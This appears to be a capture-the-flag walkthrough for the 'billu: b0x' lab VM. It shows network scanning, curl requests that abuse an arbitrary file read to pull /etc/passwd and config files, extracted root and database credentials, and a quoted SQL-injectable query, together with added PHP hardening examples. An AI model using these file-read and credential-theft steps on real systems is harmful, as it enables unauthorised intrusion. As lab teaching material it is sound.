billu: b0x

 

netdiscover -r x.x.x.0/24

 

nmap <IP of billu>

PORT STATE SERVICE

22/tcp open ssh

80/tcp open http

 

nmap -p 1-65535 -T4 -A -v <IP of billu>

nmap -p- -A <IP of billu>

nmap -T4 -A -v -p- <IP of billu>

nmap -sSV -n -Pn <IP of billu> -T5

 

nikto -h http://<IP of billu>

 

dirb http://<IP of billu>

 

Dirb finds a couple of interesting directories: /add, /show and /test

 

We also want to run a Dirb scan with big.txt as the wordlist:
dirb http://<IP of billu> /usr/share/wordlists/dirb/big.txt

or

dirb http://<IP of billu> /usr/share/dirb/wordlists/big.txt

or

dirb http://<IP of billu> /opt/wordlists/SecLists/Discovery/Web_Content/big.txt

or just

locate big.txt

 

From these Dirb results we see there is a phpMyAdmin installation in the /phpmy/ directory: http://<IP of billu>/phpmy/phpmyadmin

 

So, navigating to http://<IP of billu>/phpmy/ sends us to the phpMyAdmin login page.

But root:<blank> doesn't work.

 

Navigating to http://<IP of billu>/test gives us the error:
'file' parameter is empty. Please provide file path in 'file' parameter

 

So, from this output, we can determine that /test.php reads a parameter called file and returns the contents of that path from the server, so let's pass it using curl:

 

curl -X POST -F 'file=/etc/issue' http://<IP of billu>/test.php

Ubuntu 12.04.5 LTS \n \l
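The behaviour above (a `file` parameter handed straight to a file read) is what makes /test.php an arbitrary file read. As an added example, not the VM's own test.php, here is how such a handler is written so that it can only serve files from one fixed directory: the request is resolved with realpath() and rejected unless the result still sits under that directory. BASE_DIR is an assumed path; the POST parameter name `file` is the one the page describes.

```php
<?php
// Added example, not billu: b0x's own test.php. A "file" parameter is served
// only if it resolves to a regular file inside BASE_DIR (an assumed path).
declare(strict_types=1);

const BASE_DIR = '/var/www/public_docs'; // assumption: the only directory that may be served

function resolve_safe_path(string $baseDir, string $requested): ?string
{
    $base = realpath($baseDir);
    if ($base === false) {
        return null; // base directory must exist
    }
    // Only relative names are expected: refuse empty input, NUL bytes and absolute paths.
    if ($requested === '' || strpos($requested, "\0") !== false || $requested[0] === '/') {
        return null;
    }
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($candidate === false) {
        return null; // target does not exist
    }
    // realpath() has collapsed every ../ segment and followed symlinks;
    // whatever it produced must still start with "<base>/".
    if (strncmp($candidate, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $candidate;
}

// Request handling with the same interface the page describes (POST parameter "file").
$requested = $_POST['file'] ?? '';
if ($requested === '') {
    http_response_code(400);
    exit("'file' parameter is empty.");
}
$path = resolve_safe_path(BASE_DIR, $requested);
if ($path === null || !is_file($path)) {
    http_response_code(404);
    exit('Not found.');
}
header('Content-Type: text/plain');
readfile($path);
```

The prefix check is done on the realpath() result, not on the raw input, so `../` sequences and symlinks that point outside BASE_DIR are caught after resolution rather than by pattern matching. Where the set of servable files is small and known, a fixed allowlist of names is simpler still and removes the path handling entirely.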

 

Now, let's try to extract the phpmyadmin's config file. We can use BurpSuite or curl to change the HTTP method from GET to POST.

(Note: for BurpSuite methods go here: https://scriptkidd1e.wordpress.com/billu-b0x-vulnhubs-vm-walkthrough/)

(Note: We no longer really care about the phpmyadmin backend credentials if we can exploit the SQLi.)

 

curl -X POST -F 'file=/var/www/phpmy/config.inc.php' http://<IP of billu>/test.php

Here, we get the creds root:roottoor

 

We can try these creds with SSH:

ssh root@<IP of billu>

or

ssh <IP of billu>

But we get a WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! error. That means known_hosts already holds a different host key for this IP (typical when lab VMs reuse the same address), so remove the stale entry and reconnect:

So:

ssh-keygen -f "/root/.ssh/known_hosts" -R <IP of billu>

 

whoami

root

:))))))))~~~~~~~~~~~~~

 

 

Note: These creds do not work on the phpmyadmin login, duh...

___________________________________________________________

 

To go the phpMyAdmin route:

 

We can also extract the user list, the /etc/passwd file:

curl -X POST --data "file=/etc/passwd" http://<IP of billu>/test.php

 

Let's also extract index.php:

curl -X POST --data "file=index.php" http://<IP of billu>/test.php

At the top of this output we see the inclusion of two files, c.php and head.php. Also, we see that login authentication uses an auth table in the database, with the query built by string concatenation:
$run='select * from auth where pass=\''.$pass.'\' and uname=\''.$uname.'\'';
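The query above splices $uname and $pass straight into the SQL text, which is the SQL injection the author refers to. As an added example that is not part of the VM's index.php, here is the same login written with a mysqli prepared statement, using the auth table and the uname and pass columns the extracted query shows; the $_POST field names and the $conn connection are assumptions.

```php
<?php
// Added example, not billu: b0x's own index.php. Contrasts the page's
// string-built query with a parameterised one against the same auth table.
declare(strict_types=1);

// As extracted from index.php: a quote in $uname or $pass becomes part of the
// SQL text and changes the structure of the WHERE clause.
function vulnerable_login_query(string $uname, string $pass): string
{
    return 'select * from auth where pass=\'' . $pass . '\' and uname=\'' . $uname . '\'';
}

// Hardened form: the SQL text is fixed at prepare() time and user input is only
// ever sent as bound values, so it cannot alter the query.
function login(mysqli $conn, string $uname, string $pass): ?array
{
    $stmt = $conn->prepare('SELECT * FROM auth WHERE uname = ? AND pass = ?');
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $conn->error);
    }
    $stmt->bind_param('ss', $uname, $pass);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// Usage (assumption: $conn is a mysqli connection like the one c.php creates,
// and the login form posts "uname" and "pass").
// $user = login($conn, $_POST['uname'] ?? '', $_POST['pass'] ?? '');
// if ($user === null) { /* reject */ }
```

The parameterised version also keeps the result handling the same: one row on success, null otherwise, so the surrounding session logic does not need to change. Storing passwords as hashes (password_hash()/password_verify()) rather than comparing them in the WHERE clause is the separate fix for the plaintext pass column the query implies.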

 

Now, let's open the c.php file:
curl -X POST --data "file=c.php" http://<IP of billu>/test.php

This reveals the credentials of the phpmyadmin page:
$conn = mysqli_connect("127.0.0.1","billu","b0x_billu","ica_lab");

So the creds to phpMyAdmin are billu:b0x_billu

 

Go here to finish rooting this box the phpMyAdmin way: https://scriptkidd1e.wordpress.com/billu-b0x-vulnhubs-vm-walkthrough/